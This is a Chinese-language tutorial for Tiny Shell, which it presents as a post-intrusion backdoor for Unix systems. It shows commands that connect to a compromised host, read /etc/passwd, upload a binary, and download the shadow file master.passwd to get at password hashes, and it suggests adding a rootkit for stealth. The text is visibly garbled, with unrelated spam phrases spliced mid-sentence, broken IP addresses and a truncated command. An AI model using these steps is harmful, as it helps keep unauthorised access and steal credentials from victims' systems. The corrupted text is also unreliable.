1.Tiny Shell使用说明书

Tiny Shell使用说明书

       Tiny Shell是一款轻量级的标准远程Shell工具，可以提供远程执行命令(包括：Rlogin，Telnet，Ssh等)和文件传输功能(上传、下载)，支持单字节，手机代挂源码完全支持pseudo-Terminal Pairs(pty/tty)等伪终端。

       一，前言

       随着互联网的发展，使用Unix/Linux系统的越来越多，而入侵一台Unix/Linux系统也不再是什么难事了。通常，ai Programmer 源码在入侵成功之后，都会留一个或几个后门，以便再次进入;对于Unix/Linux系统，后门的种类比较多，初级的有修改“.rhosts”文件，复制一个Shell到一个隐藏目录，修改etc/passwd文件加用户等手段。较高级的莫属使用内核模块后门(Rootkit)了，它是Unix/Linux系统下最高级别的后门，也许最具有隐蔽性的，但今天我并不说Rootkit，react connect 源码因为它的使用过于复杂，对没有Unix/Linux系统使用经验的人来说，更是难以驾御。而 Tiny Shell作为一款运行于Unix/Linux系统下的轻量级Shell工具，不仅小巧，还支持另外一些不错的功能，具体请看下文。

       二，应用

       1，Tiny Shell简介 Tiny Shell是一款轻量级的标准远程Shell工具，可以提供远程执行命令(包括：Rlogin，出库管理源码Telnet，Ssh等)和文件传输功能(上传、下载)，支持单字节，完全支持pseudo-Terminal Pairs(pty/tty)等伪终端。并使用强大的-bit RC4加密，以躲避嗅探器的检测具备AES- + HMAC-SHA1的强大加密和认证。支持FreeBSD，NetBSD， OpenBSD，Solaris、dnsmasq源码结构SunOS，HP-UX，IRIX，Cygwin，Linux等系统。

       2，Tiny Shell应用 测试环境： 本地：OpenBSD 3.4 IP：..0. 目标：FreeBSD 4.9 STABLE IP：..0. 首先下载Tiny Shell，解压缩后修改源代码，以求该工具更能符合我们的要求。 #fetch mand”，比如./tsh ..0. “cat etc/passwd”，这条命令的意思是连接..0.目标主机，接着执行cat etc/passwd命令，这样，目标主机的passwd文件我们就一览无余了(如图3)。但要注意，使用这种形式并没有登陆目标主机，只是连接目标主机，然后插入一个Shell命令而已。 现在我们来看看上传、下载的使用方法。从源代码中知道，上传的关键字为Put，下载的关键字为Get。好，先来看看如何上传文件，执行“./tsh ..0. put 文件名 目标主机目录”即可完成上传，但要注意，文件要在当前目录下，也就是和tsh在同一个目录下。我上传的一个back的二进制文件，使用./tsh ..0. put back /，这条命令是将back文件上传目标根目录，然后我再使用./tsh ..0.连接到目标主机，ls查看back是否已经上传到了对方主机(如图4)，呵呵，还不错吧!在来看下载文件，它的语法为 “./tsh ..0. get 目标文件 本地目录”，现在我们来获得其最敏感的文件----master.passwd(影子文件，也就是Linux系统下的shadow文件)。执行./tsh ..0. get etc/master.passwd /home/dahubaobao，意思为下载目标主机的master.passwd文件到本地的/home/dahubaobao目录，然后使用ls查看，可以看见已经将对方的master.passwd下载到了本地(如图5)，再vi master.passwd(如图6)，哈哈，用户的加密密码近在眼前。提示，FreeBSD的用户密码是采用MD5加密的。

       小结

       Tiny Shell作为一款小型的Shell工具，丝毫不逊于其他同类的Shell工具，而且支持大部分的Unix/Linux系统，绝对值得一试。当然，这款后门很不隐蔽，我们可以结合Rootkit来加固(Rootkit中也提供Shell工具，但无法和Tiny Shell相比，不信你可以自己试试)，Rootkit的使用可以去google找答案，在此就不多说了。